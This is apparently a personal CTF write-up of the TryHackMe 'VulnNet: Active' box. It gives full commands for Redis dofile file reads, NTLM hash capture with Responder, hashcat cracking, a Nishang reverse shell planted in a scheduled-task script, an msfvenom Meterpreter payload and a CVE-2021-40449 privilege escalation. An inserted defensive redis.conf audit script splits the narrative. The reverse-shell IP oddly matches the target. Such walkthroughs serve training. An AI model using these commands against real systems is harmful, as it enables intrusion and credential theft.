VulnNet: Active Tryhackme
VulnNet Entertainment just moved its entire infrastructure… Check this out…
Information gathering
rustscan
nmap
First I ran smbmap and smbclient, but they showed that there is no anonymous login.
Then I found a Redis server running on port 6379. First I tried to connect to it using nc and ran the command
CONFIG GET *
and we got a username.
After some time I found that it is possible to read a file with the eval and dofile functions in Redis: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
and we got our user flag!!
capturing the NTLM hash
Since the dofile function in Redis gives us something close to command execution, we can force the machine to connect back and open a remote resource with dofile(<our_ip>/some_remote_share).
This way we force the machine to send its NTLM hash when it connects to us.
For this we need Responder to host an SMB server, which will also capture the hash!!
python3 Responder.py -I tun0
After running Responder, let's try to access a remote resource with the help of redis-cli
redis-cli -h 10.10.121.213 -p 6379 eval "dofile('//10.17.0.110//share')" 0
Once the above command runs, it will give us the NTLMv2 hash in our Responder terminal:
Now let's try to crack the hash with hashcat using the following command
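As an added defensive example (not part of the original writeup): a small Python audit of the redis.conf settings that let the CONFIG GET * enumeration and the eval/dofile file read and NTLM coercion above succeed, with a weak configuration beside a hardened one. Both sample configs are constructed here, and the hardened password is a placeholder.

```python
# Constructed sample redis.conf reproducing the exposure in the writeup:
# reachable from the network, no password, CONFIG and EVAL open to any client.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
# requirepass is commented out, so no authentication is required
"""

# Hardened counterpart: loopback only, password required, risky commands disabled.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass REPLACE_WITH_STRONG_PASSWORD
rename-command CONFIG ""
rename-command EVAL ""
rename-command EVALSHA ""
"""


def parse_redis_conf(text: str) -> dict[str, list[str]]:
    """Map each directive to a list of its argument strings (rename-command
    may repeat). Comments and blank lines are dropped; assumes no '#' in values."""
    conf: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        directive, _, args = line.partition(" ")
        conf.setdefault(directive.lower(), []).append(args.strip())
    return conf


def audit_redis_conf(text: str) -> list[str]:
    """Return one finding per setting that enables the CONFIG GET / EVAL dofile chain."""
    conf = parse_redis_conf(text)
    findings: list[str] = []
    # Redis defaults when a directive is absent: bind all interfaces, protected-mode yes, no password.
    addrs = [a.lstrip("-") for b in conf.get("bind", ["0.0.0.0"]) for a in b.split()]
    if any(a not in ("127.0.0.1", "::1") for a in addrs):
        findings.append("bind: listens on a non-loopback interface")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled, unauthenticated remote clients allowed")
    if not any(v and v != '""' for v in conf.get("requirepass", [])):
        findings.append("requirepass: not set, no authentication needed to run commands")
    disabled = {r.split()[0].upper() for r in conf.get("rename-command", [])
                if r.split()[1:] == ['""']}
    for cmd in ("CONFIG", "EVAL", "EVALSHA"):
        if cmd not in disabled:
            findings.append(f"rename-command: {cmd} still reachable by clients")
    return findings
```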
hashcat.exe -m 5600 <NTLMv2_hash> rockyou.txt -O -d 2
and we have successfully cracked the hash!!
After cracking the hash, let's enumerate the SMB shares!!
Let's see what's in that share with the help of smbclient.
Let's download the file and see what it contains!!
The downloaded file contains some basic code like so:
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
Nothing much of interest!!
Then I thought of AS-REP roasting or Kerberoasting, but since there is no LDAP service running on the server, we can't do AS-REP roasting or Kerberoasting remotely.
After waiting and figuring out lots of things, I figured out that the file we found in Enterprise-Share might be used by a scheduled task. Let's try to overwrite it with a Nishang shell; we will be using Invoke-PowerShellTcp.ps1.
At the very end of the Nishang file add
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.121.213 -Port 1234
and rename the Nishang file to PurgeIrrelevantData_1826.ps1.
Now let's put the file on the SMB share and wait for some time; maybe we get a shell if the scheduled task runs from that location!!
Now just overwrite the file with
put PurgeIrrelevantData_1826.ps1
After successfully putting the file on the share, let's fire up our nc listener
nc -lvp 1234
Within 30 seconds we get our first shell!!!
Let's now upgrade to Meterpreter.
Simply create a Meterpreter reverse shell like so:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.17.0.110 LPORT=9991 -f exe -o revshell.exe
Now host the file with Python
python3 -m http.server 80
Now download the reverse shell file with curl like this
curl <my_localip>/revshell -o revshell
Now set up msfconsole and execute the revshell file:
After getting the Meterpreter shell, let's now enumerate the machine.
Now I would like to run the local exploit check to find out which exploit can be used; this can be an easy win, but it can also crash the machine if the wrong exploit is used.
There were 6 exploits, but after researching and looking around I found that
exploit/windows/local/cve_2021_40449
might be very useful because that exploit is specific to a build version.
Both the exploit and our target match build version 17763, so it can potentially be used!!
Let's give it a go!!
Set LHOST to your local host and LPORT to a port of your choice.
Also set the already existing Meterpreter session.
And yes!! It executed and we got the elevated shell!!
Now we can simply get the flag from system.txt.
Using the right exploit makes the privilege escalation part easier!!
THANK YOU FOR READING MY ARTICLE !! 👊👊
Please support me by following me on Medium and other social platforms:
https://twitter.com/kryolite_secure/
https://www.instagram.com/kryolite_security/
https://github.com/surya-dev-singh/
You can also subscribe to me 🙌 on YouTube, where I post walkthroughs and other ethical-hacking-related videos.